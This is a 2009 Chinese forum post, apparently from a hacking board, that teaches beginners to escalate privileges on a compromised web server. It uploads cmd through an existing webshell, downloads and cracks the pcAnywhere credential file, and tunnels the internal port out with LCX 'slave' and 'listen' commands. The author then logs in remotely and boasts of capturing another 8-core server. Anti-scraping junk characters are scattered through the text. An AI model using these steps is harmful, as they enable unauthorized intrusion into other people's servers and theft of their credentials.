|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
# }* H1 ~6 M6 g* A$ I* u
$ q- n# F- ]# c2 w$ n* a+ H提权方法:pcanywhere+LCX4 O5 h; w, `1 I3 c1 @5 P' l* F+ M8 m
+ |! M# t3 t3 b5 w! p3 L获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。! s" _& r8 G; B
$ p5 V7 P" H; P' j
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
! g% S" `8 d: O6 ^( z/ J) Y0 }6 U& ?! W2 e. k3 L
5 ^6 K2 V) [" s' w& ]$ f6 l
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
; w2 B$ S {* X0 k, R! J0 }9 L* X& c& j
8 ?2 Z. Q- G) p* T/ y呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。' r& u4 q, b! [/ ^
. X+ j$ Y+ j" S: K5 m# b
8 A5 }8 q# o0 r. \# K8 ~( P/ l% c- C, }! e+ n- i, h
& ~& [8 ~7 F. M. E6 M
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``) L& z ?& k( n% [3 k. F
% _% w& X5 c+ D* [" ~
4 o+ Q6 V! a: j% K# _5 v* I
LCX的用法再简单说下:
3 d/ p7 A: F, Q' R9 N
9 I" ~9 j2 O8 c8 L$ d1 i服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
9 Z! z! h' O1 t4 K/ C: r8 ~+ a; ]; _' K
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
* z' O1 W: v; R9 q1 M: U& N+ @' w3 O$ \
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
R2 n; C: X# f( f. {顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``. V' d+ F0 b; X" D M
# E$ w O0 @/ ?5 g
' j8 c+ G4 |0 a6 s9 Q4 r
/ G( E% K2 I7 u% l0 x1 V0 c
( X: D; V( x$ H% z( L ^; f呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
7 n7 b! y+ N5 F, F: n/ V5 q! ^2 i( p
! m8 ]- a+ F. e
! R1 \) }( z2 U3 [3 Y( S# K
$ A& x/ J0 m0 }7 K我们本地连接试试,输入我们刚破解的账号密码
]! M9 e5 \( ]9 ?4 r4 E
5 A& f! _7 \% {! z8 L
$ V4 Y) z8 V0 T6 b( a' p呵呵``连接成功,服务器不错,又一个8核^︵^
' y' D4 W# m7 b( j( f+ i( N, G G1 ~( ?2 R2 }1 [
& ^: @ g8 R; q e P& W. \( s
! N Q8 q4 D, G7 g& Y( B) u |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
